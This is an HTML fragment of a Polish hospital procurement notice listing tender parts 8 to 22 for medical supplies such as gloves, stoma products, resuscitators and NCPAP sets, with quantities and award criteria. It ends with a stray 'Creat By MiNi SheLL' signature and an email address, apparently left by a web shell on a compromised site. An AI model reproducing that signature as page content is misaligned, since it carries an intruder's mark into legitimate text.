<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Fartuch ochronny. Fartuch włókninowy, niesterylny, jednorazowego użytku. Tylna strona oddychająca, przednia strona i rękawy pokryte materiałem wodoodpornym. Do stosowania na brudnej stronie w centralnej sterylizatorni. Długie rękawy z gumowymi mankietami. Chroni przód i tył ciała. Rozmiar uniwersalny. Długość 136 cm. Kolor pomarańczowy. Gramatura materiału 15g/m2 Opakowanie 100 szt	op	6	,
2	Maska ochronna> Pełna ochrona twarzy (nos, usta, oczy) i doskonale optyczne widzenie. Bardzo lekka 16g regulacja wysokości i kąta osłony, odporna na zarysowania, z powłoką antyrefleksyjną, nie żółknie w warunkach światła dziennego. Wielokrotnego użytku. Komplet zawiera:1 oprawa, 10 osłon, 2 uchwyty (adaptery) do zamontowania osłony na zwykłych okularach optycznych. Kolor oprawy przeźroczysty .	klp	5	,
3	Pakiet uzupełniający 10 sztuk osłon do maski ochronnej.	op	5	,
4	Długie rękawice nitrylowe posiadające wysoką odporność na przebicia i rozerwania oraz wysoką odporność na środki chemiczne. Spełniająca kategorię nr 3 rękawice ochronne wysokiego ryzyka. Możliwość oburęcznego noszenia. Długość 40 cm, klolor biały. Dostępne rozmiary : M,L, XL, XXL Opakowanie 100 szt.	op	8	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Drobny sprzęt medyczny różny (1).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Okulary ochronne typu Gogle, damskie, odporne na środki dezynfekcyjne z możliwościąś dezynfekcji.	szt.	36	,
2.	Szczotka do czyszczenia kanałów roboczych endoskopu i kolonoskopu (kanał roboczy o 2,5 mm) długość min. 230 mm.	szt.	2	,
3.	pieluchy tetrowe 60x80 cm wykonane z 100 % z naturalnej bawełny	szt.	360	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Akcesoria do stomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Pasta gojąca w paskach, przylegająca do wilgotnych powierzchni, tworząca środowisko sprzyjające gojeniu   i chroniaca skórę przed uszkodzeniem        op = 10 szt	op	4	,
2.	Pasta gojąca w tubie, przylegająca do wilgotnych powierzchni, tworząca środowisko sprzyjające gojeniu   i chroniaca skórę przed uszkodzeniem      op = 12 szt  	op	1	,
3.	Krem przeciw odparzeniom do skóry wokół stomii         op = 6 szt	op	1	,
4.	Płytka stomijna - ochronna, wielkość 15 cmx15cm,         stosowana w celu ochrony skóry w przypadkach , kiedy wydzieliny organizmu powodują jej uszkodzenie  op = 10 szt	op	1	,
5.	Płytka stomijna pediatryczna, wielkość 17 mm bez otworu (otwór do wycięcia)                                                  op = 10 szt	op	20	,
6.	Worek stomijny pediatryczny , otwarty, przezroczysty lub z nadrukiem, dwuczęściowy z zamknięciem na rzepy,  wielkość 17 mm                                                                     op = 30szt	op	15	,
7.	Płytka stomijna pediatryczna do stomii wklęsłych , wielkość 40 mm    op = 5 szt	op	6	,
8.	Worek stomijny pediatryczny , otwarty, przezroczysty lub z nadrukiem, dwuczęściowy z zaciskiem do stomii wklęsłych,  wielkość 40 mm                                                op = 30 szt	op	2	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Prowadnice do trudnej intubacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Prowadnice do trudnej intubacji, rozmiar 10CH (wielorazowe) z tworzywa, które po użyciu (zakrzywienie) powracają do pierwotnego kształtu (bez metalu)	szt.	8	,
2.	Prowadnice do trudnej intubacji, rozmiar 15CH (wielorazowe) z tworzywa, które po użyciu (zakrzywienie) powracają do pierwotnego kształtu (bez metalu)	szt.	8	,
3.	Prowadnice do trudnej intubacji, rozmiar 5CH z tworzywa, które po użyciu (zakrzywienie) powracają do pierwotnego kształtu (bez metalu)	szt.	20	,

poz. 1-3 z tworzywa gdzie zagięcie powraca do pierwotnego stanu, nie zbrojone.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Resuscytatory wielorazowe typu AMBU              noworodkowe, niemowlęce,pediatryczne i dla dorosłych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Resuscytator typu AMBU silikonowy, bez lateksu, dla  wcześniaków i noworodków o masie ciała do 5 kg objętość oddechowa 150 ml, objętość rezerwuaru od 0,5 do 1,0 l; z możliwością wielokrotnej sterylizacji w temperaturze 134oC; kompletny z maską  i rezerwuarem tlenu , wyposażony w mechanizm ograniczający ciśnienie do poziomu nie przekraczającego 45cm H2O, z podwójną ścianą worka.	szt.	5	,
2.	Resuscytator typu AMBU silikonowy, bez lateksu, dla niemowląt o masie ciała do 10 kg, objętość oddechowa 150 ml, objętość rezerwuaru od 0,5 do 1,0 l; z możliwością wielokrotnej sterylizacji w temperaturze 134oC; kompletny z maską  i rezerwuarem tlenu , wyposażony w mechanizm ograniczający ciśnienie do poziomu nie przekraczającego 45cm H2O.	szt.	20	,
3.	Resuscytator typu AMBU silikonowy, bez lateksu, dla dzieci o masie ciała od 10 kg - 30 kg,  objętość oddechowa 450 ml, objętość rezerwuaru odpowiednia do objętości oddechowej; z możliwością wielokrotnej sterylizacji w temperaturze 134oC; kompletny z maską  i rezerwuarem tlenu , wyposażony w mechanizm ograniczający ciśnienie H2O.	szt.	5	,
4.	Resuscytator  typu AMBU silikonowy, bez lateksu, dla dzieci o masie ciała od  30 kg,  objętość oddechowa 1100 ml, objętość rezerwuaru odpowiednia do objętości oddechowej; z możliwością wielokrotnej sterylizacji w temperaturze 134oC; kompletny z maską  i rezerwuarem tlenu , wyposażony w mechanizm ograniczający ciśnienie H2O.	szt.	3	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Okularki do fototerapii dla noworodków i wcześniaków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Okulary do fototerapii dla noworodków zapinane na rzepy z materiału  miękkiego, niedrażniacego oczy  ( powyżej 1500g)	szt.	40
2.	Okulary do fototerapii dla noworodków zapinane na rzepy z materiału  miękkiego, niedrażniacego oczy  (poniżej  1500g)	szt.	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Komora wilgotna do osłony oka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Komory wilgotne zapobiegające wysychaniu gałek ocznych noworodkowe	pary	20
2.	Komory wilgotne zapobiegające wysychaniu gałek ocznych pediatryczne	pary	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Stojaki do kroplówek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Stojaki do kroplówek dwuramienne, z blokadą kółek	szt.	5,
2.	Stojaki do kroplówek czteroramienne, z blokadą kółek	szt.	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Rękawice z nitrylu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawice z nitrylu - wytrzymałe na ścieranie, odporne na przecięcia, działenie rozpuszczalników, kwasów, zasad, olejów, tłuszczów, rozpuszczalników organicznych, charakteryzujące się chwytnością, zachowujące swoją formę, dłuższy mankiet opakowanie 100 sztuk). Dostępne w rozmiarach S.M, L	op. 	480.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Jakość - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Patyczki higieniczne do czyszczenia uszu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Patyczki higieniczne do czyszenia uszu (op. =100 szt.), Waciki ściśle przylegający do patyczka, kształt wacika owalny.	op.	72.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Wzierniki do otoskopu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wzierniki do otoskopu,  niesterylne;  rozmiar :  2,5 mm  ( strona do ucha  O  2,5mm;  strona do obserwacji   O 17mm ;     długość 36 mm)                                                  	    op.     =50 szt, 	115
2.	Wzierniki do otoskopu,  niesterylne;  rozmiar :  4,0 mm  ( strona do ucha  O 4,0mm;  strona do obserwacji   O 17mm ;     długość 30 mm)                                                  	op.     =50 szt,	210.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Dozownik tlenu z nawilżaczem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozownik tlenu z nawilżaczem z wtykiem o długości 70 mm do gniazda tlenu typu AGA  (przepływ 0-15 l/min), w zestawie  z butelką z możliwością poddawania procesom dezynfekcji i sterylizacji.	szt	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Łyżki i rękojeść do laryngoskopów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Rękojeść do laryngoskopu, bateryjna dla dorosłych, kompatybilna ze wszystkimi łyżkami zakrzywionymi	,	szt.	2	,
2.	Łyżki zakrzywione żarówkowe, kompatybilne z rękojeścią Multimed rozm. 0	,	szt.	3	,
3.	Łyżki zakrzywione żarówkowe, kompatybilne z rękojeścią Multimed rozm. 1	,	szt.	3	,
4.	Łyżki zakrzywione żarówkowe, kompatybilne z rękojeścią Multimed rozm. 2	,	szt.	3	,
5.	Łyżki zakrzywione żarówkowe, kompatybilne z rękojeścią Multimed rozm. 3	,	szt.	3	,
6.	Łyżki zakrzywione żarówkowe, kompatybilne z rękojeścią Multimed rozm. 4	,	szt.	3	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Zestawy NCPAP.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Zestaw NCPAP bez rur  z rzepami do mocowania i czapeczką nr 0	szt.	80	,
2.	Zestaw NCPAP bez rur  z rzepami do mocowania i czapeczką   nr 1	szt.	80	,
3.	Zestaw NCPAP bez rur  z rzepami do mocowania i czapeczką   nr 2	szt.	80	,
4.	Zestaw NCPAP bez rur  z rzepami do mocowania i czapeczką   nr 3	szt.	80	,
5.	Zestaw NCPAP z rurami z rzepami do mocowania i czapeczką  nr 0	szt.	80	,
6.	Zestaw NCPAP z rurami z rzepami do mocowania i czapeczką  nr 1	szt.	80	,
7.	Zestaw NCPAP z rurami z rzepami do mocowania i czapeczką  nr 2	szt.	80	,
8.	Zestaw NCPAP z rurami z rzepami do mocowania i czapeczką  nr 3	szt.	80	,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Kołnierze ortopedyczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Kołnierze ortopedyczne miękkie:
	rozmiar 6x30	szt.	10,
	rozmiar	8x43	szt.	10,
	rozmiar	8x48	szt.	10,
	rozmiar	10x43	szt.	10,
	rozmiar	10x48	szt.	10,
	rozmiar	10x56	szt.	8,
	rozmiar	12x48	szt.	8
2.	Kołnierze ortopedyczne -urazowe, dwuczęściowe, sztywne
rozmiar	S	szt.	8,
rozmiar		M	szt.	8,
rozmiar		L	szt.	8,
rozmiar		XL	szt.	8,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com